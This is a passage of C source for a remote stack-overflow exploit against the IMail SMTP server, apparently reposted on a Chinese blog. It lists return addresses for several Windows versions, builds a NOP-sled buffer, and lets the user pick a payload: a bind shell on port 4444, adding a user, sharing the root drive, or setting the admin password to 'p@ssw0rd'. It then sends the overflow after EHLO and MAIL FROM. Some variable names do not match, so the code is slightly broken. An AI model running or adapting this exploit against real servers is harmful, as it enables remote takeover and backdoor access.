       char IMail815[] = "\x71\x6f\x03\x10:";             //IMAIL 8.15 SMTPDLL.DLL       [pop ebp, ret] 0x10036f71
    char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:";        //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
    char WinXPSP2[] = "\x23\x7e\x96\x7c:";            //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
    char WinXPSP1[] = "\x9c\x38\xab\x71:";            //WinXP SP1 and 0 English U32    [pop ebp, ret]0x71ab389c
    char Win2KE[] = "\x97\x31\x02\x75:";            //Win2k English All SPs            [pop ebp, ret]0x75021397
    char Win2KF[] = "\x97\x13\xfa\x74:";            // As above except French Win2k    [pop ebp, ret]0x74fa1397
    char WinXPG[] = "\x14\x8c\xd1\x77:";            //WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14

    char tail[] = "SSS>\n";                            // This closes the RCPT cmd.  Any characters work.
    // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
    // After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
    // On all versions from 8.x to 2006 (9.x?)
    char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44";    // Stabolize Stack prior to payload.
       memset(overflow, 0, 1028);
       strcat(overflow, Exp);
    if (JMP == 1)
    {
        printf("Using IMail 8.15 SMTDP.DLL JMP\n");
        strcat(overflow, IMail815);
    } else if (JMP == 2)
    {
        printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
        strcat(overflow, Win2k3SP1E);
    } else if (JMP == 3)
    {
        printf("Using Win2003 SP0 USER32.DLL JMP\n");
        strcat(overflow, Win2k3SP0E);
    } else if (JMP == 4)
    {
        printf("Using WinXP SP2 NTDLL.DLL JMP\n");
        strcat(overflow, WinXPSP2E);
    } else if (JMP == 5)
    {
        printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
        strcat(overflow, WinXPSP1);
    } else if (JMP == 6)
    {
        printf("Using Win2000 Universal English USER32.DLL JMP\n");
        strcat(overflow, Win2KE);
    } else if (JMP == 7)
    {
        printf("Using Win2000 Universal French USER32.DLL JMP\n");
        strcat(overflow, WinSKF);
    } else if (JMP == 8)
    {
        printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
        strcat(overflow, WinXPG);
    } else {
        printf("Using IMail 8.15 SMTDP.DLL JMP\n");
        strcat(overflow, IMail815);
    }
        


    // Setup Payload Options
    if (atoi(argv[3]) == 1)
    {
        printf("Using Root Share Payload\n");
        plen = 544 - ((strlen(RootShare) + strlen(StackS)));
        for (i=0; i<plen; i++){
            strcat(overflow, "\x90");
        }
        strcat(overflow, StackS);
        strcat(overflow, RootShare);

    } else if (atoi(argv[3]) == 2)
    {
        printf("Using Add User Payload\n");
        plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
        for (i=0; i<plen; i++){
            strcat(overflow, "\x90");
        }
        strcat(overflow, StackS);
        strcat(overflow, AddUser);
    } else if (atoi(argv[3]) == 3)
    {
        printf("Using Win32 CMD Bind Payload\n");
     &nbsp
;  plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
        for (i=0; i<plen; i++){
            strcat(overflow, "\x90");
        }
        strcat(overflow, StackS);
        strcat(overflow, Win32Bind);
    } else if (atoi(argv[3]) == 4)
    {
        printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n");
        plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
        for (i=0; i<plen; i++){
            strcat(overflow, "\x90");
        }
        strcat(overflow, StackS);
        strcat(overflow, ChangeAdmin);
    } else
    {
        printf("Using Win32 CMD Bind Payload\n");
        plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
        for (i=0; i<plen; i++){
            strcat(overflow, "\x90");
        }
        strcat(overflow, StackS);
        strcat(overflow, Win32Bind);
    }

    // Dont forget to add the trailing characters to set up stack overflow
    strcat(overflow, tail);



    // Connect to SMTP Server and Setup Up Email
       char EHLO[] = "EHLO \r\n";
       char MF[] = "MAIL FROM <TEST@TEST> \r\n";
       send(sockfd, EHLO, strlen(EHLO), 0);
       Sleep(1000);
       send(sockfd, MF, strlen(MF), 0);
       Sleep(1000);


       if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
       {
        printf("ERROR: Send Error\n");
          closesocket(sockfd);
          WSACleanup();
          exit(-1);
      }

      printf("Exploit Sent.....\r\n");
    if (atoi(argv[3]) == 3)
    {
        printf("Check Shell on Port 4444\n");
        closesocket(sockfd);
          WSACleanup();
          exit(0);
    }

    printf("Checking If Exploit Executed....\r\n");
    Sleep(1000);
    closesocket(sockfd);

    sockin.sin_family = hp->h_addrtype;
       sockin.sin_port = htons(port);
       sockin.sin_addr = *((struct in_addr *)hp->h_addr);

       if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
       {
          printf("ERROR: Socket Error\n");
          exit(-1);
       }

       if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
       {
          printf("Exploit Successfully Delivered!\n");
        closesocket(sockfd);
        WSACleanup();
        printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
        exit(0);
       }
    printf("...");
    if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
       {
          printf("Exploit Successfully Delivered!\n");
        closesocket(sockfd);
        WSACleanup();
        printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
        exit(0);
       }

       /* wait for SMTP service welcome*/
       buf[bytes] = '\0';
       check = strstr(buf, "220");
       if (check == NULL)
       {
          printf("Exploit Successfully Delivered!\n");
        closesocket(sockfd);
        WSACleanup();
        printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
        exit(0);
       }

    printf("Exploit Failed: Try A different JMP Method or Payload\n");
    closesocket(sockfd);
      WSACleanup();
      exit (1);
}



分类: 矩阵毒刺 标签: